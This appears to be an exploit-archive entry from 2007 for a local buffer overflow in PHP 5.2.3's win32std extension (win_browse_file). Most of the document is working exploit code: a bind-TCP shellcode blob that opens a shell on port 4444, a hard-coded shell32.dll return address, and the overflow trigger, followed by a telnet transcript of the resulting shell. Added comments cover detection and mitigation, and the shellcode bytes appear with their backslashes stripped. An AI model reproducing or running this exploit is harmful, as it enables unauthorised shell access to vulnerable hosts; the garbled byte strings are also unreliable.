
# Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
# Published : 2007-08-22
# Author : Inphex


<?php
/*
Inphex
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020  7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

// Guard: the proof-of-concept only makes sense if the win32std extension is
// loaded, because win_browse_file() is the function it drives. On a host where
// the extension is not enabled this script exits here — which is also the
// simplest mitigation (do not load win32std in php.ini on untrusted hosts).
if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
// Payload blob appended into the oversized argument below. The header comment
// describes it as a 317-byte Windows x86 bind-TCP shell (port 4444 in the
// author's telnet transcript). For detection purposes the blob itself is an
// indicator: a PHP file that passes a long concatenated string built from
// str_repeat() plus opaque byte sequences into win_browse_file() is the
// pattern to alert on, independent of the exact bytes.
$shellcode=
"x2bxc9xb1x51xbaxbbxb2xd5x31xdaxdaxd9x74x24xf4".
"x58x31x50x0ex83xc0x04x03xebxb8x37xc4xf7xd7x5c".
"x6axefxd1x5cx8ax10x41x28x19xcaxa6xa5xa7x2ex2c".
"xc5x22x36x33xd9xa6x89x2bxaexe6x35x4dx5bx51xbe".
"x79x10x63x2exb0xe6xfdx02x37x26x89x5dxf9x6dx7f".
"x60x3bx9ax74x59xefx79x5dxe8xeax09xc2x36xf4xe6".
"x9bxbdxfaxb3xe8x9ex1ex45x04x23x33xcex53x4fx6f".
"xccx02x4cx5ex37xa0xd9xe2xf7xa2x9dxe8x7cxc4x01".
"x5cx09x65x31xc0x66xe8x0fxf2x9axa4x70xdcx05x16".
"xe8x89xfaxaax9cx3ex8exf8x03x95x8fx2dxd3xdex9d".
"x32x18xb1xa2x1dx01xb8xb8xc4x3cx57x4ax0bx6bxc2".
"x49xf4x43x7ax97x03x96xd6x70xebx8ex7ax2cx40x7d".
"x2ex91x35xc2x83xeax6axa2x4bx04xd7x4cxdfxafx06".
"x05xb7x0bxd2x55x8fx03x1cx43x65xbcxb3x3ex85x6c".
"x5bx64xd4xa3x75x33xd8x6axd6xeexd9x43xb1xf5x6f".
"xe2x0bxa2x90x3cxdbx18x3bx94x23x70x50x7ex3bx09".
"x91x06x94x16xcbxacxe5x38x92x24x7exdex33xdax13".
"x97x21x76xbcxfex80x4bxb5xe7xb9x17x4fx05x0cx58".
"xbcx63x91x1ax6ex8dx2cxb7xe3xfcxcbxffxa8x55x80".
"x68xddx57x64x7exdexd2xcfx80xf6x47x87x2cxa6x26".
"x76xbbx49x99x29x6ex1bxe6x1axf8x36xc1x9ex37x1b".
"x0ex76xadx63x0fx40xcdx4cx64xf8xcdxeexbex63xd1".
"x27x6cx93xfdxa0x60xe1xfax6fxd3x09xd4x6fx03xf5".
"xd9x8f";

// Hard-coded 4-byte value that the trailing comment attributes to shell32.dll.
// It is tied to one specific Windows build (the header names "Windows TinyXP"),
// so the crash path is not portable across systems — which is why the durable
// fix is updating PHP beyond 5.2.3 and not loading win32std, rather than
// anything address-related.
$eip = "xDCx1Cx9Cx7C"; //shell32.dll
// Trigger: the second argument is str_repeat("A", 260) followed by $eip,
// filler and $shellcode — the oversized input behind the "Local Buffer
// Overflow" in the title. Note the attack is local: it requires the ability to
// execute PHP on the host with win32std loaded (e.g. a shared-hosting or
// safe_mode scenario), so restricting who can run scripts and removing the
// extension are the controls. The remaining arguments (NULL, NULL, the
// "*" => "*.*" filter array) appear to be just what the function signature
// needs to reach the affected code path — presumably; not verifiable from
// this page.
win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXXx20xf0xfdx7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) );
?>
